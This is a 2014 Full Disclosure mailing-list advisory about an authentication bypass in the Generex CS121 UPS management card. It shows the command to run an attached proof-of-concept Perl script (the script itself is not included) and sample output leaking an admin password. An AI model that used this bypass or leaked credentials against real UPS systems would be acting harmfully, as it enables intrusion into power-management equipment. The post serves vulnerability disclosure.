Message-Id: <N1-LxSxbiUn2a@Safe-mail.net>
Date: Thu, 15 May 2014 16:25:23 -0400
From: jkmac@...e-mail.net
To: fulldisclosure@...lists.org
Subject: [FD] UPS Web/SNMP-Manager CS121 authentication bypass,
	credentials leak, ...

UPS Web/SNMP-Manager CS121 by Generex comes with a default-enabled "service" port that makes it possible to bypass any specified login for HTTP(s), SNMP or telnet.

CS121 is a widely used management card in UPS systems from Legrand, Rittal, Eaton, AEG, Masterguard...

Attached is a PoC, found and proven on Legrand UPS with different firmware releases. If you are hardcore enough, you may also flash your own HyNetOS-firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

View attachment "upssearch-pl.txt" of type "text/plain" (746 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
